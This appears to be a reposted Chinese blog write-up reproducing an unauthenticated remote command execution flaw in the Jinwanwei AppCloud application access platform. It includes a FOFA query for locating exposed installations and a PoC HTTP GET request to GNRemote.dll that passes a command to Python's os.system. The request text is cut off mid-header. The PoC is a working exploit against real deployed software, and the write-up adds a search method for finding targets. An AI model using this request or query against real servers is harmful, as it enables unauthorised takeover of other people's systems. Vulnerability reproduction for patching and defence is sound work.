当前位置:   article > 正文

金万维-云联应用系统接入平台 GNRemote.dll 前台RCE漏洞复现

gnremote.dll

0x01 产品简介

金万维-云联(AppCloud)应用系统接入平台是一款企业级私有云产品,旨在帮助企业构建高效便捷的私有云环境,降低运营成本,提高运营效率,并增强企业快速响应市场的能力,云联(AppCloud)由北京金万维科技有限公司开发,它完成了从桌面机计算到云中计算的转变,不仅提供了一种空间,还实现了架构和计算方式的转变。云联要求流程自动化、简化部署,并提供灵活性,以满足企业在任何地方、用任何工具都能高效工作的需求。

0x02 漏洞概述

金万维-云联应用系统接入平台 GNRemote.dll接口存在远程命令执行漏洞,未经身份验证的远程攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

0x03 复现环境

FOFA:title="云联应用系统接入平台"

eec6c2e96c244247b0bb22a2baf1ce46.png

0x04 漏洞复现

PoC

  1. GET /GNRemote.dll?GNFunction=CallPython&pyFile=os&pyFunc=system&pyArgu=执行的命令 HTTP/1.1
  2. Host:
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
  4. Accept-Encoding: g
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/从前慢现在也慢/article/detail/1002776
推荐阅读
相关标签
  

闽ICP备14008679号